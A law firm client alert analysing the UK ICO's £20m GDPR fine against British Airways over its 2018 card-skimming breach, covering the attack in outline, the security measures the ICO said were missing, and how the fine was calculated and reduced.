In a long-awaited final decision, the UK Information Commissioner’s Office (the “ICO”) has issued a fine of £20m to British Airways (“BA”) following a data breach that took place in 2018.  Although by some way the largest fine ever issued by the ICO, this represents a significant reduction from the £183.39m fine initially proposed by the ICO in July 2019, as we reported here.

The ICO’s penalty notice (the “Decision”) gives a useful insight into how the regulator will assess whether there has been a breach of the requirement to implement appropriate security measures and into the calculation of the appropriate fine, although the policy for calculating the fine is subject to an ongoing review. The description of the interactions between BA and the ICO will be of interest to those dealing with the regulator, and the fact BA has not admitted liability is a nod to the ongoing litigation.

Data Breach

The Decision, which runs to some 114 pages, states that the attack is believed to have resulted in potential access to the personal data of over 429,000 BA customers and staff. This included names, addresses, payment card numbers and CVV numbers of approximately 244,000 BA customers.

The Decision sets out the alleged facts of the breach, many of them previously unknown. In summary, the Decision reports that:

  • between 22 June and 5 September 2018, a malicious actor (the “Attacker”) gained access to an internal BA application through the use of compromised credentials for a Citrix remote access gateway (“CAG”);
  • the compromised credentials belonged to a user within a third-party supplier to BA, who accessed BA’s network remotely;
  • after gaining access to the wider network, the Attacker traversed the network and ultimately managed to edit a Javascript file on BA’s website. The edits made by the Attacker enabled the exfiltration of cardholder data from “www.britishairways.com” to an external domain (www.BAways.com) controlled by the Attacker;
  • between 21 August and 5 September 2018, when customers entered payment card information into BA’s website, a copy was sent to the Attacker, without interrupting the normal BA booking and payment procedure; and
  • the issue came to the attention of BA only when it was alerted by a third party.

The ICO found that BA failed to process personal data in a manner that ensured appropriate security of the personal data, including protection against unauthorised or unlawful processing against accidental loss, destruction or damage, using appropriate technical and organisational measures as required by the GDPR.

In the ICO’s view, how did BA fall short of its GDPR security obligations?

Not every instance of unauthorised processing or breach of security will amount to a breach of the GDPR. The obligation under the GDPR is to implement appropriate technical and organisational measures to ensure an appropriate level of security, taking into account factors such as the cost of implementation, the nature, scope, context and purposes of processing, and risk to the affected individuals.  The Decision noted that, when considering whether there has been a breach of the GDPR and whether to impose a penalty, the ICO must avoid reasoning purely with the benefit of hindsight. The focus should be on the adequacy and appropriateness at the time the measures were implemented, risks that were known or could have been reasonably identified or foreseen, and appropriate measures that could and should have been, but were not, in place.

The Decision identifies measures available to BA that were not taken, in respect of each of the eight steps of the attack identified in the ICO’s decision.  These measures include: (i) limiting access to applications, data and tools to the degree required to fulfill a user’s role; (ii) undertaking rigorous testing, in the form of simulating a cyberattack, on the company’s systems; and (iii) protecting employee and third-party accounts with multi-factor authentication.

How was the fine calculated?

According to the Decision, the ICO’s process for calculating the fine consists of five steps:

  1. The ICO started with an amount reflecting any financial gain from the breach, which in BA’s case was £0.
  2. It added a penalty based on the scale and severity of the incident, which the ICO assessed at £30m.
  3. The ICO considered a further penalty to reflect any aggravating factors, but none were identified.
  4. The ICO considered whether an additional penalty was necessary for the fine to have a deterrent effect, and decided that none was necessary.
  5. The ICO then considered a reduction in the fine to reflect any mitigating factors, including ability to pay. It reduced the fine by 20%, to £24m, in recognition of the fact that: (i) BA took immediate steps to mitigate any damage suffered by the affected individuals; (ii) BA promptly informed the affected individuals, law enforcement and regulatory agencies, and the ICO, and fully cooperated with the ICO’s enquiries ; (iii) widespread reporting on the breach is likely to have increased the awareness of other data controllers of the risks posed by cyberattacks and the need to take all appropriate measures to secure personal data, and (iv) the attack and subsequent regulatory action adversely affected BA’s brand and reputation. The ICO specifically mentioned the speed of BA’s individual notifications – within two days of discovering the breach – illustrating the benefits of a swift notification process.

Finally, having regard to the impact of the COVID-19 pandemic on BA’s business and consistent with its published guidance, the ICO decided that a further reduction of £4m was appropriate and proportionate, bringing the fine to £20m.

What happened to the proposed fine of £183.39m?

Following the publication of the ICO’s notice of intention to fine BA in July 2019, several extensions to the six-month period for issuing the fine were agreed.  The originally proposed fine was calculated using the ICO’s “Draft Internal Procedure” for calculating proposed penalties.  It is clear from the Decision that BA strongly contested the validity of using this Procedure.  It appears that the primary objection was the use of turnover ranges as a basis for determining the fine.

Ultimately, it appears that the ICO agreed not to apply the Draft Internal Procedure, and the ultimate fine amount was determined without reference to the amount initially proposed.  Instead, the ICO applied the framework set out in the GDPR and the UK Data Protection Act 2018 in conjunction with the ICO’s Regulatory Action Policy (“RAP”), which states that, before issuing fines, the ICO must take into account the economic impact and affordability of the fine for the company. The RAP is currently under review as part of an ongoing consultation. Under the proposals under consultation, the ICO plans to reduce penalties by 20% when companies pay within 28 days and do not appeal.

Takeaways

The reduction in the fine amount will be seen by many as a victory for BA. It fought hard throughout the process, disputing both that there was a breach of the GDPR and that a penalty should be imposed.

Nonetheless, the fine still serves as a reminder that security of personal data is one of the most important principles of the European data protection regime. The final fine is dramatically higher than any previously issued by the ICO.

The ICO brought the enforcement action as the lead supervisory authority under the GDPR. The penalty and action were approved by the other EU DPAs through the GDPR’s cooperation process. Given Brexit, this fine may prove to be one of a very small number of actions taken through this process that would involve the ICO.

The specific security measures that the ICO believed should have been in place – role-based access control measures, tabletop exercises, and multi-factor authentication – are  widely accepted in the security community as basic elements of a robust data security program. The Decision confirms that, as of 2018 at least, failure to implement such elements may be regarded as a violation of the GDPR.

The significant fine reduction as a result of mitigating factors encourages an open and cooperative approach with the ICO and proactive management of the risks to individuals resulting from data breaches.  At the same time, the Decision quotes heavily from BA’s written representations to the ICO, highlighting the need to carefully consider what companies communicate, and how.  As post-breach litigation risk increases, companies will need to be more careful than ever in this respect.

Author

Jeremy Feigelson is a Debevoise litigation partner, Co-Chair of the firm’s Data Strategy & Security practice, and a member of the firm’s Intellectual Property and Media Group. He frequently represents clients in litigations and government investigations that involve the Internet and new technologies. His practice includes litigation and counseling on cybersecurity, data privacy, trademark, right of publicity, false advertising, copyright, and defamation matters. He can be reached at jfeigelson@debevoise.com.

Author

Luke Dembosky is a Debevoise litigation partner based in the firm’s Washington, D.C. office. He is Co-Chair of the firm’s Data Strategy & Security practice and a member of the White Collar & Regulatory Defense Group. His practice focuses on cybersecurity incident preparation and response, internal investigations, civil litigation and regulatory defense, as well as national security issues. He can be reached at ldembosky@debevoise.com.

Author

Jane Shvets is a Debevoise partner in the firm’s White Collar & Regulatory Defense Group, focusing on white collar defense and internal investigations, in particular regarding compliance with corrupt practices legislation, as well as compliance assessments. Ms. Shvets also advises multinational clients on data protection and cybersecurity matters as well as a wide range of sanctions issues. She can be reached at jshvets@debevoise.com.

Author

Christopher Garrett is an English-qualified associate who is a member of the Debevoise Data Strategy & Security practice and part of the Corporate Department, also specialising in employment law. He can be reached at cgarrett@debevoise.com.

Author

Robert Maddox is an associate based in the London office and a member of Debevoise's White Collar & Regulatory Defense and International Dispute Resolution Groups, as well as the firm’s Data Strategy & Security practice. His practice focuses on complex multi-jurisdictional investigations, disputes and cybersecurity matters. He can be reached at rmaddox@debevoise.com.

Author

Martha Hirst is an associate in Debevoise's Litigation Department based in the London office. She is a member of the firm’s White Collar & Regulatory Defense Group, and the Data Strategy & Security practice. She can be reached at mhirst@debevoise.com.

Author

Dr. Friedrich Popp is a senior associate in Debevoise's Frankfurt office and a member of the firm’s Litigation Department. His practice focuses on arbitration, litigation, internal investigations, corporate law, data protection and anti-money laundering. In addition, he is experienced in Mergers & Acquisitions, private equity, banking and capital markets and has published various articles on banking law. He can be reached at fpopp@debevoise.com.